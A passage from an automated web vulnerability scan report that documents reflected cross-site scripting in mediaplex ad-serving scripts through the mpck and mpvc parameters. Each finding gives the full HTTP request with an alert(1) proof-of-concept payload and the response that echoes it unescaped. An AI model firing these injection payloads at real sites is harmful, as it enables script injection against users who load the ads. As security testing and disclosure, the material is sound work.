GET /content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-68%3Fpid%3D67732%26bid%3D2606%26mpt%3D572011105140PM4014&pid=67732&bid=2606&mpt=572011105140PM4014&mpvc=http://ads.betfair.com/redirect.aspx?id=bid=2606;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=65257"%3balert(1)//921777b93b0 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.betfair.com/ad.aspx?bid=2606&pid=67732
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:58:21 GMT
Server: Apache
Last-Modified: Wed, 27 Apr 2011 08:40:12 GMT
ETag: "767c27-fa7-4a1e263917300"
Accept-Ranges: bytes
Content-Length: 4863
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://ads.betfair.com/redirect.aspx?id=bid=2606;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=65257";alert(1)//921777b93b0");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ads.betfair.com/redirect.aspx?id=bid=2606;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=65257";alert(1)//921777b93
...[SNIP]...

5.46. http://img.mediaplex.com/content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2237c"%3balert(1)//fecb4e3286a was submitted in the mpck parameter. This input was echoed as 2237c";alert(1)//fecb4e3286a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-33%3Fpid%3D67732%26bid%3D2005%26mpt%3D572011105310PM10952237c"%3balert(1)//fecb4e3286a&pid=67732&bid=2005&mpt=572011105310PM1095&mpvc=http://ads.betfair.com/redirect.aspx?id=bid=2005;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.betfair.com/ad.aspx?bid=2005&pid=67732
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:59:47 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 10:56:24 GMT
ETag: "59ef15-e3-49f9ce9426600"
Accept-Ranges: bytes
Content-Length: 428
Content-Type: application/x-javascript

document.write( "<iframe allowtransparency='true' src='http://www.streameye.net/banners.aspx?id=6281&clickTAG=http://ads.betfair.com/redirect.aspx?id=bid=2005;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=http://adfarm.mediaplex.com/ad/ck/15368-110724-22624-33?pid=67732&bid=2005&mpt=572011105310PM10952237c";alert(1)//fecb4e3286a' width='728' height='90' scrolling='no' frameborder='no' style='border-width:0'>
...[SNIP]...

5.47. http://img.mediaplex.com/content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c68cc"%3balert(1)//e0d90dee1b7 was submitted in the mpvc parameter. This input was echoed as c68cc";alert(1)//e0d90dee1b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-33%3Fpid%3D67732%26bid%3D2005%26mpt%3D572011105310PM1095&pid=67732&bid=2005&mpt=572011105310PM1095&mpvc=http://ads.betfair.com/redirect.aspx?id=bid=2005;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=c68cc"%3balert(1)//e0d90dee1b7 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.betfair.com/ad.aspx?bid=2005&pid=67732
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:59:50 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 10:56:24 GMT
ETag: "59ef15-e3-49f9ce9426600"
Accept-Ranges: bytes
Content-Length: 428
Content-Type: application/x-javascript

document.write( "<iframe allowtransparency='true' src='http://www.streameye.net/banners.aspx?id=6281&clickTAG=http://ads.betfair.com/redirect.aspx?id=bid=2005;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=c68cc";alert(1)//e0d90dee1b7http://adfarm.mediaplex.com/ad/ck/15368-110724-22624-33?pid=67732&bid=2005&mpt=572011105310PM1095' width='728' height='90' scrolling='no' frameborder='no' style='border-width:0'>
...[SNIP]...

5.48. http://img.mediaplex.com/content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 373dd"%3balert(1)//c77f2a02d1 was submitted in the mpck parameter. This input was echoed as 373dd";alert(1)//c77f2a02d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-64%3Fpid%3D67732%26bid%3D5170%26mpt%3D572011105310PM1096373dd"%3balert(1)//c77f2a02d1&pid=67732&bid=5170&mpt=572011105310PM1096&mpvc=http://ads.betfair.com/redirect.aspx?id=bid=5170;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.betfair.com/ad.aspx?bid=5170&pid=67732
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:59:48 GMT
Server: Apache
Last-Modified: Wed, 02 Mar 2011 11:24:21 GMT
ETag: "73a9bd-e4-49d7e27804340"
Accept-Ranges: bytes
Content-Length: 428
Content-Type: application/x-javascript

document.write( "<iframe allowtransparency='true' src='http://www.streameye.net/banners.aspx?id=5778&clickTAG=http://ads.betfair.com/redirect.aspx?id=bid=5170;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=http://adfarm.mediaplex.com/ad/ck/15368-110724-22624-64?pid=67732&bid=5170&mpt=572011105310PM1096373dd";alert(1)//c77f2a02d1' width='160' height='600' scrolling='no' frameborder='no' style='border-width:0'>
...[SNIP]...

5.49. http://img.mediaplex.com/content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28546"%3balert(1)//91d135a34f6 was submitted in the mpvc parameter. This input was echoed as 28546";alert(1)//91d135a34f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-64%3Fpid%3D67732%26bid%3D5170%26mpt%3D572011105310PM1096&pid=67732&bid=5170&mpt=572011105310PM1096&mpvc=http://ads.betfair.com/redirect.aspx?id=bid=5170;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=28546"%3balert(1)//91d135a34f6 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.betfair.com/ad.aspx?bid=5170&pid=67732
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:59:51 GMT
Server: Apache
Last-Modified: Wed, 02 Mar 2011 11:24:21 GMT
ETag: "73a9bd-e4-49d7e27804340"
Accept-Ranges: bytes
Content-Length: 429
Content-Type: application/x-javascript

document.write( "<iframe allowtransparency='true' src='http://www.streameye.net/banners.aspx?id=5778&clickTAG=http://ads.betfair.com/redirect.aspx?id=bid=5170;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=28546";alert(1)//91d135a34f6http://adfarm.mediaplex.com/ad/ck/15368-110724-22624-64?pid=67732&bid=5170&mpt=572011105310PM1096' width='160' height='600' scrolling='no' frameborder='no' style='border-width:0'>
...[SNIP]...

5.50. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4caf"-alert(1)-"ec16db5a7c7 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093c4caf"-alert(1)-"ec16db5a7c7&mpt=5423093&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b00/3/0/%2a/b%3B241006849%3B0-0%3B1%3B37579671%3B4307-300/250%3B42070593/42088380/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:50:41 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 4298
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093c4caf"-alert(1)-"ec16db5a7c7");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093c4caf"-alert(1)-"ec16db5a7c7");
mpck = "h
...[SNIP]...

5.51. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 721fc'%3balert(1)//ead46c1023b was submitted in the mpck parameter. This input was echoed as 721fc';alert(1)//ead46c1023b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093721fc'%3balert(1)//ead46c1023b&mpt=5423093&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b00/3/0/%2a/b%3B241006849%3B0-0%3B1%3B37579671%3B4307-300/250%3B42070593/42088380/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:50:43 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 4304
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b00/3/0/*/b;241006849;0-0;1;37579671;4307-300/250;42070593/42088380/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/16228-124632-16454-1?mpt=5423093721fc';alert(1)//ead46c1023b" target="_blank">
...[SNIP]...

5.52. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f92f9'%3balert(1)//e1637aca820 was submitted in the mpvc parameter. This input was echoed as f92f9';alert(1)//e1637aca820 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093&mpt=5423093&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b00/3/0/%2a/b%3B241006849%3B0-0%3B1%3B37579671%3B4307-300/250%3B42070593/42088380/1%3B%3B%7Esscs%3D%3ff92f9'%3balert(1)//e1637aca820 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:51:23 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 4300
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b00/3/0/*/b;241006849;0-0;1;37579671;4307-300/250;42070593/42088380/1;;~sscs=?f92f9';alert(1)//e1637aca820http://altfarm.mediaplex.com/ad/ck/16228-124632-16454-1?mpt=5423093" target="_blank">
...[SNIP]...

5.53. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22bea"%3balert(1)//050f33362ed was submitted in the mpvc parameter. This input was echoed as 22bea";alert(1)//050f33362ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093&mpt=5423093&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b00/3/0/%2a/b%3B241006849%3B0-0%3B1%3B37579671%3B4307-300/250%3B42070593/42088380/1%3B%3B%7Esscs%3D%3f22bea"%3balert(1)//050f33362ed HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:51:21 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 4300
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b00/3/0/*/b;241006849;0-0;1;37579671;4307-300/250;42070593/42088380/1;;~sscs=?22bea";alert(1)//050f33362ed");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b00/3/0/*/b;241006849;0-0;1;37579671;4307-300/250;42070593/42088380/1;;~sscs=?22bea";
...[SNIP]...

5.54. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14867"-alert(1)-"af246ecfe7f was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D57013914867"-alert(1)-"af246ecfe7f&mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:50:52 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 4280
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D57013914867"-alert(1)-"af246ecfe7f");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D57013914867"-alert(1)-"af246ecfe7f");
mpck = "ht
...[SNIP]...

5.55. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4888f'%3balert(1)//bc918fe2e78 was submitted in the mpck parameter. This input was echoed as 4888f';alert(1)//bc918fe2e78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D5701394888f'%3balert(1)//bc918fe2e78&mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:50:54 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 4286
